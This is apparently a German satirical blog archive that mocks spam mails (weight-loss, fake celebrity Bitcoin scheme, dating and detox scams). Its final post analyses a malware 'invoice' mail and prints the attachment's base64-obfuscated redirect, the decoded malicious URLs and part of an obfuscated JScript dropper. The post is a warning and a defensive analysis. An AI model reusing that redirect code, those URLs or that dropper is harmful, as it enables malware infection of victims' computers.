Kategoriearchiv „Mail“

Bis zu 17 kg in 14 Tagen!*

Freitag, 7. Oktober 2022

13Kg in 9 Tagen !!

Weiter

Ja, Spammer,

ist schon schwierig mit den Zahlen, vor allem, wenn man so ein Grundschulabbrecher wie du ist und deshalb niemals den Dreisatz gelernt hat. Dann denkt man sich einfach Zahlen für die Gewichtsabnahme in einigen Tagen aus, weil man denkt, Zahlen seien total beeindruckend. Und wenn man sich zweimal irgendwelche Zahlen ausdenkt, so glaubst du, dann wird es sogar doppelt beeindruckend. Aber die „bis zu 17 Kilogramm in 14 Tagen“ aus dem Betreff, wenn man doch mit doppeltem Ausrufezeichen in neun Tagen 13 Kilogramm abnimmt…

$ echo "scale=3; 14*13/9" | bc
20.222
$ _

Mit Stable Diffusion generiertes Bild eines absurden Displays, das absurde Zeichen anzeigt. …entpuppen sich beim einfachsten Nachrechnen – für jene leider viel zu vielen Menschen, die dieses frühere Hauptschulrechnen trotz Durchlaufen ihrer Schulpflicht an den bundesdeutschen Volksverdummungsschulen und ihrer dabei als neuen Regelabschluss erworbenen Hochschulzugangsberechtigung nicht mehr beherrschen: Wenn man in neun Tagen 13 Kilogramm abnimmt, nimmt man an einem Tag ein Neuntel von 13 Kilogramm ab, und in vierzehn Tagen das Vierzehnfache dieses Wertes – als über zwanzig Kilogramm. Die liegen deutlich über deiner Bis-zu-Obergrenze von 17 Kilogramm. Und das merkt man sogar schon, wenn man schnell im Kopf abschätzt. Oder, um es mit einer Zahl zu sagen: Deine beeindruckenwollenden 17 Kilogramm liegen rd. zwanzig Prozent daneben¹.

Nein, im Kopfrechnen bin ich auch nicht mehr geübt, ich habe ja meistens einen Computer in der Nähe. Und du Spammer, du hattest doch sicher auch einen Computer vor dir stehen, als du deine Spam formuliert hast. Vermutlich bist du vor allem im Denken nicht mehr so geübt. 😁️

Und damit gehörst du genau zu den Leuten, denen man seine Gesundheit besser nicht anvertrauen sollte. ⚰️

Ich wünsche dir alles Gute für deinen weiteren Lebensweg! Mögest du fortan mehr Glück beim Denken haben! 🍀️

Dein dich „genießender“
Nachtwächter

¹Gut, es sind rd. 19 Prozent. Aber ich wollte auch mal runden.

Die jüngste Investition von Sonja

Donnerstag, 6. Oktober 2022

Sonja Zietlow ist als erfolgreiche Unternehmerin bekannt.

Echt jetzt? Ich kenne die gar nicht. Vermutlich habe ich zu selten einen Fernseher an. 🤔️

Is this email not displaying correctly? View it in your browser.

Ah ja! Wenn das HTML der Spam so „zerschossen“ aussieht, dass sie komisch dargestellt wird, dann soll man klicken und sich das HTML einer Webseite anschauen. Vielleicht wird das ja besser. 🤦‍♂️️

Man kann Mails, die „zerschossen“ aussehen, auch einfach ungelesen löschen. Interessante Mitteilungen von denkenden und fühlenden Menschen haben solche Probleme gar nicht erst. Das kann nur Spammern passieren, die sich mit allerlei Tricks an Spamfiltern vorbeimogeln müssen. Das hat bei dieser Spam übrigens nicht funktioniert. Sie wurde automatisch aussortiert. 😊️

Hallo

Genau mein Name! 👏️

(Late Night Berlin) – Die Deutsche Fernsehmoderatorin und Fernsehproduzentin Sonja Zietlow ist als erfolgreiche Unternehmerin bekannt.

Ach, und dachte schon, sie sei aus dem Fernsehen bekannt. Denn die Zielgruppe dieser Spam kennt alles nur aus dem Fernsehen. 📺️

Letzte Woche erschien Sonja Zietlow im Late Night Berlin und kündigte eine neue „Kapital-Gesetzeslücke“ an, von der sie sagt, dass sie jeden innerhalb von 3-4 Monaten in einen Millionär verwandeln kann. Sonja forderte alle Deutsche auf, diese großartige Gelegenheit zu nutzen, bevor die Großbanken sie für immer schließen.

Mit Stable Diffusion generiertes Bild: Übertrieben lächelnde Frau, für die es Banknoten vom Himmel regnet So eine Zielgruppe, die alles nur aus der Glotze kennt, wundert sich dann auch gar nicht weiter darüber, dass sich eine Unterhaltungs-Frontfresse in der Glotze hinstellt und Gesetzeslücken ankündigt, mit denen jeder ohne Fähigkeiten und Kenntnisse ganz viel Geld aus der Steckdose ziehen kann. Mühelos. Ohne diese lästige Arbeit. 🔌️💰️

Die wundern sich noch nicht einmal, wenn sie das gar nicht in der Glotze gesehen haben, sondern nur in einer Spam erzählt bekommen. In der sie als „Hallo“ angesprochen werden. 📬️

Die glauben das, weil es so schön klingt und wollen dann nur noch wissen, wo sie sich selbst das ganze Geld aus der Steckdose ziehen können. Die hl. Glotze hat es ihnen ja gesagt. Mit einer Spam. Die ihnen gesagt hat, dass die Glotze es ihnen gesagt hat. 🤦‍♂️️

Beim Spaziergang im Schlaraffenland sollte man den Mund besser geschlossen lassen. Die Bratwürste fliegen sehr tief. ⚠️

Und tatsächlich, kurz nachdem das Interview beendet war, rief ein Vertreter der Deutschen Bundesbank an, um das Interview von Sonja zu stoppen – es war aber bereits zu spät.

Ah ja! Bei der Deutschen Bundesbank gibt es also bezahlte Leute, deren Job unter anderem darin besteht, sich irgendwelche Trashshows in der Glotze anzuschauen und dann mit Anrufen zu verhindern, dass das dort Gesagte bekannt wird. Das ist ein psychiatrisch sehr wertvoller Einblick in die Phantasie des Spammers. 😁️

Hier die Geschehnisse im Detail:

Klaas Heufer-Umlauf hat Sonja Zietlow eingeladen, um seinen Zuschauern möglichst viel Information über ihre Investitionen weiterzugeben. Und dann hat Sonja tatsächlich die folgende Bombe abgeworfen:

„Einer der Gründe, warum ich so Erfolgreich bin, ist, schnell und ohne zu zögern neue Gelegenheiten zu erkennen und daraus Profit zu schlagen. Und im Moment ist meine „Gelddruckmaschine“ ein neues Auto-Trading-Programm, der Bitcoin UP .Er ist zugleich auch das Beste, was ich jemals gesehen habe, um blitzschnell ein kleines Vermögen aufzubauen. Aus diesem Grund fordere ich jeden Einzelnen auf, ihn für sich auszuprobieren, bevor die Banken ihn schließen.“

Mit Stable Diffusion generiertes Bild: Sparschwein, umgeben von Münzen und Banknoten „Wie, ich dachte, das lief in der Glotze. Und jetzt soll ich doch wieder Texte lesen? So wie damals in der Schule? Diese anstrengenden Buchstaben? Okay, es gibt ja Pinke-Pinke, also mache ich mir mal die Mühe. Oh, es gibt Gelddruckmaschinen! Steht da! Irgendwelche Software, die automatisch für mich mit Kryptogeld rumzockt und dabei blitzeschnelle Unmengen von Zaster aus dem Nichts holt. Steht da! Sagt Sonja Zietlow. Steht da! Im hl. Fernsehen. Steht da! Jetzt muss ich aber schnell machen, bevor die Banken das wieder zumachen. Oh, ich brauche schon Geld, um zu ‚investieren‘? Gleich mal das Sparschwein schlachten.“ So soll man diesen Text lesen? Ernsthaft, Spammer? 🤡️

Fürwahr, eine Bombe. Einige Gehirne sind schon zerfetzt. 💣️🧠️

Natürlich ist das ein Betrug. Damit die Software ihren angeblichen Handel treiben kann, muss man Geld bei einer angeblichen Handelsplattform einzahlen, fürs erste meist 250 Euro. Dann sieht man auf dem Bildschirm, wie daraus immer mehr Geld wird, aber das sind nur angezeigte Zahlen. Nach kurzer Zeit ruft jemand an – man hat sich vor diesen Betrügern bei seiner Registrierung auf der Handelsplattform ja komplett datennackt gemacht – und gratuliert zu den großen Erfolgen und den ordentlichen paar tausend Euro, die man jetzt hat. Mit Stable Diffusion generiertes Bild eines Schimpansen an einer Slotmaschine Und dann quasselt er das Gehirn weich, bis er es auslöffeln kann, damit man in seiner dummen Gier noch mehr Geld nachschießt, um noch mehr Profit zu machen. Gern auch Darlehen, die Zinsen sind ja so günstig gerade. Es wäre doch dumm, jetzt nicht richtig zuzugreifen. Und es werden immer größere Zahlen in der Software angezeigt, und man glaubt, richtig Geld gemacht zu haben.

Leider löst sich dieser Glaube schnell in Luft, Ärger und Scham auf, wenn man das Geld abholen will. Das geht nämlich nicht. Die angeblichen Gewinne existieren nicht. Sie sind nur Zahlen in einer Software, kein Geld. Das heißt aber nicht, dass die Betrüger nicht noch einmal zulangen würden, wenn man sein Geld haben will. Dafür muss man nämlich eine gesalzene Gebühr bezahlen. Die ist dann natürlich auch weg. 💸️

Danach bricht jeder weitere Kontakt ab und man bemerkt, dass man es die ganze Zeit mit völlig Unbekannten zu tun hatte. Diese Form des Betrugs – so lächerlich sie klingt, wenn ich sie mit kurzen Worten zusammenfasse – ist dermaßen häufig geworden, dass sie sogar schon zum Thema in der Tagesschau wurde. Die Prominenten wissen gar nichts davon, dass ihre Namen und Fotos von gewerbsmäßigen Betrügern missbraucht und in den Dreck gezogen werden. 💩️

Fast immer soll das von Betrügern angepriesene, mühelose Zaubergeld mit Bitcoin entstehen. Es gibt diesen Betrug allerdings auch mit Rohöl (selten) und mit der chinesischen Digitalwährung (in letzter Zeit häufiger) und vermutlich in einigen weiteren Verpackungen. Aber es ist der gleiche Betrug, und es sind vermutlich die gleichen Betrüger. 🕵‍♂️️

Wer nicht darauf reinfallen will, braucht sich eigentlich nur einen einzigen Satz zu merken: Geld kommt nicht aus der Steckdose. 🔌️🚫️

Lesen Sie Sonjas Geschichte

Lest lieber die Geschichte aus der Tagesschau-Redaktion, wenn es schon etwas aus der Glotze sein muss. Die Sendung hat es – im Gegensatz zu den angeblichen Fernsehsendungen aus der Spam – sogar wirklich gegeben. 😉️

If you want to unsubscribe, click here.

Ja, Spammer, ihr könnt mich auch mal klicken! 👅️

See who’s at your front door

Dienstag, 4. Oktober 2022

Ich sehe nur, was in meinem Spameingang ist. 😐️

Machen Sie Mit Und Gewinnen Sie Einnen 750 Media Markt Gutschein

Geben Sie Ihre Gewinn Daten Ein

click here to remove yourself from our emails list

click here to remove yourself from our emails list

Und ich sehe, dass es Spammer gibt, die so enddoof sind, dass sie glauben, dass jemand auf einen derart plumpen E-Müll reinfallen würde. Und was noch viel schlimmer ist: Ich sehe, dass sie mit diesem Glauben recht behalten. ☹️

Wer da klickt, lasse alle Hoffnung fahren! Gutscheine gibt es nicht. Alle angegebenen Daten sind hinterher in den Händen von Spammern und werden missbraucht. Wenn man Glück hat, war es das. Wenn man nicht so viel Glück hat, bekommen Browser und Betriebssystem noch eine „kostenlose Sicherheitsprüfung“ durch Kriminelle, und wenn durchfallen, steht hinterher ein Computer anderer Leute auf dem Tisch.

Lieber gammelfleisch! Sie Haben Eine ausstehende Lieferung #691-1631284 – Verfolgen Sie Ihre *lieferung

Montag, 3. Oktober 2022

So so, was wird mir denn geliefert? 🤔️

Verwenden Sie Ihren Code für die Verfolgung und Entgegennahme

EXPRESS LIEFERUNG

Aha, eine Lieferung wird mir geliefert. 🤭️

Mal in den Quelltext schauen. Oh, da soll ja eigentlich ein Bild aus dem Web nachgeladen werden? Vielleicht wird ja aus dem Bild heraus klar, was mir überhaupt geliefert werden soll:

Nee, auch nicht. 😂️

Wenn Sie diese E-Mails nicht mehr erhalten möchten, können Sie sich per abmelden hier klicken
oder schriftlich an 9901 Brodie Lane Ste 160 Austin, TX 78748

Genau, die illegale E-Mail-Spam mit der Sackpost abbestellen! Für alle, denen ein per Klick auf „Click here“ nicht mehr dumm genug ist. 🤡️

Oh, im Quelltext sehe ich auch wieder eine ganz besonders dumme Form der Spamprosa. Die sieht so aus:

--b1_2f6eb7d2532051094fb14611d762d32b
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable


lehdr-flqcy-epwkq-tpffi
vlpbr-osegl-otmnf-akznq
ubvde-tvrlr-ylkml-foofm
xlrbk-stqaf-fpciv-bmncn
yotop-bwbgy-mzbvc-cixkdyefid-gpfoa-uablg-cnhwn
vtuol-zsqlr-xwgal-vlwpm
agvwx-ofket-bcjzq-fqtgz
nhbdm-bglvc-mjour-lmwvp
xfiqo-aovmn-easxe-szykw
kwzug-srpgw-nehwo-pquhw
zhfty-qywas-pjlwj-vypoy
hukgc-bvrrt-cgqhg-lwngm

Das ist der Textteil der Mail. Das ist das, was jemand sehen würde, der keine HTML-Mails in HTML anzeigen lässt. Da kann man natürlich auch irgendwelche Spamprosa verstecken, um besser am Spamfilter vorbeizukommen. Ob das geklappt hat? Na ja, ich habe diese Spam gefunden, indem ich in die automatisch aussortierte Spam geschaut habe. Es ist also nicht nur doof, sondern es funktioniert auch nicht. 💩️

Entf! 🗑️

Ändere noch heute dein Leben!

Sonntag, 2. Oktober 2022

Ändere noch heute dein Leben!

STARTEN SIE JETZT >>

Hey, Spammer,

das ist ja nett von dir, dass du dich um die Veränderung meines Lebens (allerdings leider nicht um die Verbesserung) bemühen willst, wenn ich in deine dumme Spam klicke, aber von jemanden, dessen E-Mail-Quelltext so aussieht wie deiner…

[…]

[…]

…möchte ich dann doch lieber keine Lebensberatung. 🤭️

Meint dein dich „genießender“
Nachtwächter

PS: Deine auch psychiatrisch interessante Idee, dass man so am Spamfilter vorbeikommen könnte, hat übrigens nicht funktioniert. Ich habe deinen Müll eben aus dem ekligen Glibbersieb geholt.

gammelfleisch .Willst du dich mit mir unterhalten?

Samstag, 1. Oktober 2022

Nein. 🖕️

Von: Russian Girls <newsletter@vanmoof.com>
An: lois@online.de

Die Mail ist ja gar nicht für mich. 😁️

Wird diese E-Mail nicht richtig angezeigt? Klicken Sie hier, um es in Ihrem Browser anzuzeigen.

Dieser bezaubernde Spammer, der vorgibt, einen Dating-Fleischmarkt zu betreiben, schafft es leider nicht, das HTML in seinen Spams so zu gestalten, dass ein derartiger Spruch unnötig ist. 👎️

Tausende von bezaubernden russischen Mädchen warten auf Sie!

12,000+ wunderschöne russische Damen

sind JETZT online!

Keine Lust, jetzt die ganzen – übrigens alle kostenlos und vor allem anonym bei Imgur gehosteten Fotos aus dieser HTML-Spam nachzuladen. Wenn ich das jetzt dringend brauchte, wüsste ich viel bessere Quellen für Frauenfotos. 😉️

Kommen und finden Ihre Freundin auf SinglesRussian…

join FREE

Von einem neuronalen Netzwerk generiertes, romantisches Bild einer Frau mit entblößtem Oberkörper und großen Brüsten im Kerzenschein auf dem Bett vor dem Fenster Ja, „Mitglied“ bei so einem Spamdating-Laden zu werden, ist kostenlos, wenn man wegen seiner Naivität und Dummheit den Datenstriptease vor Spammern nicht als teuer und problematisch betrachtet. Aber dann darf man für jede einzelne Chatzeile und interne Mail bezahlen, und zwar gesalzen. Natürlich chattet man nur mit Animateuren (es müssen nicht einmal Frauen sein), die zwanzig Leute gleichzeitig heiß halten oder gar noch preiswerter für den Betreiber der angeblichen Dating-Site mit einfachen Chatbots, also mit kalten, dummen Computerprogrammen. Die Frauen, von denen die Rede ist, gibt es gar nicht. Es sind hübsche, meist einfach irgendwo aus dem Internet mitgenommene Bilder von Frauen mit gut gebildeten Brüsten, zu denen Texte stehen, die eine breite Auswahl vorzüglicher Charaktereigenschaften beschreiben. Man kann sich kaum vorstellen, dass diese Frauen noch Single sein könnten, wenn diese Beschreibungen auch nur näherungsweise echt wären… 🤥️

Und überhaupt: Warum gibt es in diesen Dating-Fleischmärkten aus der Spam eigentlich immer nur Frauen? Was machen diese Frauen wohl immer mit den Männern, dass dort überhaupt keine Männer mehr unterwegs sind? 😁️

Oder läuft der russische Krieg in der Ukraine so schlecht, dass ganz viele russische Frauen zu Witwen geworden sind? Die hätten es dann aber ungewöhnlich eilig, ihren alten Gesponsen zu überwinden. 😐️

Um sich abzumelden, klicken Sie bitte auf hier

Ich habe mich gar nicht angemeldet. 🖕️

© Copyright 2021. Alle Rechte vorbehalten.

Nur echt mit proklamiertem geistigen Eigentum, aber ohne Nennung des geistigen Eigentümers. Spammer, verklag mich doch für mein Vollzitat! 😛️

Ändern Sie die Art und Weise, wie Sie Fett verbrennen

Samstag, 1. Oktober 2022

Wie jetzt, soll ich mich mit Benzin übergießen und anzünden? 🔥️

Oh, diese Spam enthält ja gar keinen Text, sondern nur noch ein Bild, das verlinkt ist, damit klicki-klicki darauf klicken kann – und dieses Bild haben die Spammer nicht einmal selbst gehostet, obwohl sie doch eine Website haben, sondern sie legen es anonym und kostenlos bei Imgur ab. Das sind also Spezialärzte, die lieber völlig unbekannt bleiben, wenn sie ihre Rosskuren verkaufen. 👤️

Für Genießer: Ich habe das Bild auch in Originalgröße. Der überlagerte Schriftzug „Spam“ ist von mir. Ich werde nicht gern zum Bildhoster für solche gemeingefährlichen Quacksalber und generell nicht für Spammer. 🚫️

Quacksalber? Ja, Quacksalber. Diese „Toxine“ und „Abfallstoffe“, von anderen Quacksalbern und Apothekern auch gern als „Schlacken“ bezeichnet, als handle es sich beim Körper um einen Hochofen, sind in der Medizin völlig unbekannt. Es gibt nicht einmal Indizien für ihre Existenz und erst recht keine belastbaren Hypothesen über ihre stoffliche Zusammensetzung. Ja, nicht einmal die Quacksalber können sagen, was für chemische Substanzen diese „Schlacken“, „Abfallstoffe“ oder „Toxine“ nun sein sollten. Sonst würde man eine solche „Entgiftung“ oder „Entschlackung“ ja auch nicht beim Quacksalber machen und sein Geld für eine wertlose Pseudoarznei gegen perfide-psychologisch suggerierte Scheinkrankheiten latzen, sondern zum richtigen Arzt gehen. 😉️

Der physiologische Grund für ein Übergewicht ist hingegen so wohlbekannt, dass das Wissen Allgemeinwissen ist: Wenn man mehr lecker Energie in Form von Essen in den Mund steckt, als man verbraucht, dann baut der Körper aus dieser überschüssigen Energie Fettreserven auf. In den sehr langen Zeiten, in denen die Ernährungslage für unsere Vorfahren wesentlich unsicherer war als heute, war das übrigens eine sehr nützliche Eigenschaft. Ist schon gut, wenn man nicht gleich stirbt, nur weil es mal drei Monate nichts zu essen gibt. Deshalb wurde das ja auch zum evolutionären Vorteil. Deshalb können wir überhaupt mehr essen, als wir aktuell an Energie benötigen. Diese ausgesprochen nützliche körperliche Eigenschaft teilen wir mit sehr vielen Wirbeltieren. 💡️

Heute kommt es dank der Zivilisation und der chemischen Industrie (Stickstoffdünger! Ein Segen!) nicht mehr so häufig zu Hungersnöten, und schon entsteht ein neues Problem: Menschen werden fett. Aber statt sich über ihren Reichtum und ihr sorgenfreies Leben zu freuen, werden sie davon meschugge und vergleichen sich jeden Tag mit den photoshop-optimierten Wahnwelten aus der Hochglanzfotografie und der Reklame, bei denen ich mich manches Mal schon gefragt habe, warum diese Frauen nicht einfach durchbrechen. Ja, jedes weibliche Model hat erhebliches Untergewicht im gesundheitsgefährdenden Bereich, und der Effekt wird von Werbern noch einmal durch Bildbearbeitung verstärkt. Solche kranken Wahnwelten prägen hier die Schönheitsideale, und bei den männlichen Models sieht es nur insofern besser aus, als dass eine gewisse Muskelmasse gewünscht ist. Da könnte man sein Schönheitsideal auch an Fotos von Menschen orientieren, die große, siffende, eitrige Geschwüre im Gesicht haben, deren Ausgestaltung noch einmal durch Bildbearbeitung optimiert wird! 😁️

Weil der physiologische Mechanismus des Fettaufbaus bekannt ist, gibt es auch eine bekannte, einfache und wirksame Methode, Körperfett wieder zu verlieren: Einfach weniger lecker Energie in den Mund stecken, als man verbraucht! Das führt allerdings zu einem Unlustgefühl. Der Volksmund spricht vom „Hunger“. Aber dafür funktioniert es. Langsam, aber sicher. 👍️

Es funktioniert übrigens nicht, weil man sich etwas zusätzliches in den Körper gibt, sondern weil man sich weniger in den Körper gibt. Es ist überdem auch kostenlos, man spart sogar Geld, und man muss auch nicht zum Quacksalber, der einem Pseudoarzneien verkauft. Ich würde allerdings empfehlen, sich an einen richtigen Arzt zu wenden, wenn es eine größere Gewichtsabnahme (sagen wir mal: mehr als fünf Kilo) werden soll. Eine langfristig angelegte Mangelernährung kann ihrerseits wieder erhebliche gesundheitliche Probleme hervorrufen und in Extremfällen sogar zum Tod führen. Gut, nach Durchschreiten des Sterbeprozesses nimmt man auch zwangsläufig ab, aber davon hat man nichts mehr, das ist eher etwas für die Würmer, Maden und Bakterien. ⚰️

Aber auf gar keinen Fall auf solche Quacksalber reinfallen. Davon nimmt im Regelfall nur der Geldbeutel ab. Die Wampe bleibt. 👛️

Ihre Rechnung 146648577349 von der Böttcher AG

Freitag, 30. September 2022

⚠️ Warnung, Schadsoftware! Auf gar keinen Fall den Anhang klicken! ⚠️

Von: Böttcher AG <no-reply@glenat.com>
An: undisclosed-recipients: ;

So so, eine Rechnung, die an ganz viele Empfänger auf einmal geht. 😂️

Natürlich kommt diese Spam nicht von der Böttcher AG, sondern von schwerkriminellen Spammern, die Rechner anderer Leute mit Schadsoftware übernehmen wollen. Bevorzugt kleine und mittelständische Unternehmen. Denen droht dann oft die Insolvenz, und dann werden Erpresser halt bezahlt. 😕️

Ihre Rechnungsnummer: 146648577349
Ihre Kundennummer: 646756981732962

Lieber Kunde,

Hach, so viele schöne Zahlen, aber der einzige Name, den ich habe, ist „Lieber Kunde“. Die scheinen ihre Kunden aber nicht zu mögen. 😁️

beiliegend erhalten Sie Ihre Rechnung als HTML-Dokument.

Ah ja! Da ist ja tatsächlich ein Anhang dran. Da steht aber nicht so viel drin. Der ist nur eine Weiterleitung zu einer base64-codierten URL. Na gut, fange ich mal an – wie üblich arbeite ich mit meiner Kommadozeile unter Linux:

$ cat Rechnung-b-a_0000003198.html 
<body id="kqisC2MKfeohSuvlhlQyUmZZdlUGTxyDYNrBPoW05qdsUurHk2yYsHp4DgvqGBSbC5Aut1qSVdJDugOkeNeshVsoPBGnbKJ3UCLXYnFs4Bu" onpageshow="document.location.href=window.atob('aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M=');">
$ echo aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M= | base64 -d; echo 
https://3t8.at/apD8qloS
$ mime-header https://3t8.at/apD8qloS | grep -i ^location
location: https://info-opensocial.googleusercontent.com/gadgets/ifr?url=https://hatcherlawgroup.com/img/inf/inf
$ _

Ab jetzt geht es nur noch mit einem richtigen Browser weiter, weil zum Zugriff auf die gängelnde und gefährliche Google-Cloud leider Javascript benötigt wird. Ja, dieser hochgefährliche Sondermüll wird anonym und kostenlos in der Cloud eines Google-Kontos gehostet. Ist es nicht „schön“, wie einfach das alles geworden ist? Hier ist längst ein Paradies für Kriminelle entstanden. Ich habe mir mal den Spaß gemacht und in einer virtuellen Maschine den Download gemacht. Die Datei ist ein ZIP-Archiv, das es in sich hat:

$ ls -lh *.zip
-rw-rw-r– 1 elias elias 96K Sep 30 15:21 5640955135.zip
$ zip -sf 5640955135.zip 
Archive contains:
  xi1132111.js
Total 1 entries (418953 bytes)
$ unzip 5640955135.zip 
Archive:  5640955135.zip
  inflating: xi1132111.js  
$ _

Dettelbach ist überall! 😱️

Diese Datei ist kein Dokument, sondern Programmcode, der nach klicki-klicki Doppelklick vom Windows Script Host ausgeführt wird. Dieser Programmcode ist ausgesprochen kryptisch formuliert und…

$ wc xi1132111.js 
     2    373 418953 xi1132111.js
$ _

…steht in lediglich zwei Zeilen, die aber insgesamt rd. 420 Kilobyte Javascript-Programmcode enthalten. 😮️

Um einen Eindruck davon zu vermitteln, wie vorsätzlich schwierig analyisierbar und kryptisch dieses Programm gecodet ist, gebe ich hier mal das erste Kilobyte aus und füge nach jedem Komma einen Zeilenumbruch ein, damit man es noch bequem lesen kann:

$ dd status=none if=xi1132111.js bs=1024 count=1 | sed 's/,/,\n/g'; echo 
function _0×3cd5(){var _0×11cf11=['\x2f\x67\x2c\x66\x5b\x31\x46\x5d\x29\x29\x3b\x31\x67\x3d',
'\x6a\x70\x66\x57\x51',
'\x79\x5c\x5a\x22\x2c\x22\x5c\x6a\x5c\x6d\x22\x2c\x22\x5c',
'\x56\x6b\x72\x7a\x62',
'\x5c\x6b\x22\x2c\x22\x5c\x74\x5c\x31\x62\x22\x2c\x22\x5c',
'\x4f\x6f\x4d\x6c\x57',
'\x4d\x41\x58\x41\x73',
'\x5c\x63\x5c\x68\x5c\x73\x5c\x63\x5c\x59\x5c\x63\x5c\x63',
'\x75\x5d\x2b\x66\x5b\x31\x76\x5d\x2b\x66\x5b\x31\x6d\x5d',
'\x61\x5c\x62\x5c\x62\x5c\x61\x5c\x62\x5c\x53\x5c\x4a\x5c',
'\x6a\x61\x61\x67\x70',
'\x7c\x7a\x6d\x42\x45\x6f\x52\x53\x64\x7c\x78\x34\x42\x7c',
'\x61\x77\x6e\x6c\x69',
'\x49\x65\x52\x45\x67',
'\x5c\x73\x5c\x63\x5c\x43\x5c\x63\x5c\x70\x5c\x61\x5c\x69',
'\x72\x4d\x79\x54\x48',
'\x49\x6d\x77\x47\x67',
'\x42\x69\x74\x77\x49',
'\x5c\x75\x5c\x6e\x5c\x6d\x5c\x72\x5c\x61\x5c\x64\x5c\x6b',
'\x77\x7a\x77\x47\x71',
'\x61\x5c\x62\x22\x2c\x22\x5c\x65\x5c\x61\x5c\x62\x5c\x64',
'\x5c\x6b\x22\x2c\x22\x5c\x6a\x5c\x55\x5c\x70\x5c\x61\x5c',
'\x5c\x2b\x5c\x2b\x20\x2a\x28\x3f\x3a\x5b\x61\x2d\x7a\x41',
'\x5c\x6f\x5c\x78\x5c\x63\x5c
$ _

Von einem neuronalen Netzwerk generiertes Bild einer verlassenen industriellen Anlage, die überall mit Blut verschmiert ist So etwas führt man doch gern auf seinem Computer aus, gelle? Vor allem, wenn es aus einer fragwürdigen Mail kommt, die von einer Rechnung faselt, aber nicht einmal eine persönliche Ansprache beinhaltet. Natürlich sollte man solchen Code nicht ausführen, auch nicht, wenn man dafür nur eine Datei doppelklicken muss. Man sollte generell E-Mail nur mit der Kneifzange anfassen. E-Mail ist sehr praktisch, das aber leider auch für Kriminelle. Wer niemals einen Anhang öffnet, der nicht vorher über ein anderes Medium als E-Mail explizit abgesprochen wurde, tut viel für seine Computersicherheit. 🛡️

Es wird sich mit an Sicherheit grenzender Wahrscheinlichkeit um Schadsoftware handeln. Diese Schadsoftware ist die neueste Brut der Kriminellen, sie wird im Moment nur von einem sehr kleinen Bruchteil der Antivirus-Programme erkannt. Zur Verdeutlichung habe ich auch einen Screenshot von VirusTotal von heute, 15:54 Uhr gemacht, weil ich hoffe, dass sich die Erkennungsrate schon in den nächsten Stunden deutlich verbessert. Das gesamte Antivirus-Schlangenöl wird also einmal mehr nicht helfen. 💀️

Vermutlich sind jetzt bereits die Netzwerke von hunderten bis tausenden Betrieben von Kriminellen übernommen worden, und in Kürze werden überall die Erpressungstrojaner Geld einfordern. Das wird Kosten verursachen und vielleicht sogar die eine oder andere Insolvenz zur Folge haben. 😵️

Auf eine Abuse-Meldung bei Google habe ich verzichtet. Ich bin nicht so ein Freund kafkaesker Erfahrungen. Stattdessen habe ich die giftige Mail an das Landeskriminalamt Niedersachsen weitergeleitet. 👮‍♂️️

Sobald Ihre Ware (Lagerware) unser Logistikzentrum verlassen hat, erhalten Sie per E-Mail eine Versandbenachrichtigung mit Link zur Sendungsverfolgung.

Den Status Ihrer Bestellung können Sie jederzeit in unserem Onlineshop www.bueromarkt-ag.de unter Mein Konto – Meine Bestellungen einsehen.
Fehlende Artikel werden automatisch nachgeliefert.

Wenn Sie einen Artikel zurücksenden möchten, nutzen Sie bitte unsere Online-Rückgabe unter Mein Konto – Rücksendung & Reklamation.

Für Rückfragen stehen wir Ihnen gern zur Verfügung.
Vielen Dank für Ihren Auftrag.

Bitte antworten Sie nicht auf diese Nachricht, da sie automatisch von einem Postfach generiert wurde, welches keine eingehenden e-Mails empfangen kann.

Mit freundlichen Grüßen

⚠️ Bitte auf gar keinen Fall darauf reinfallen! ⚠️

Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.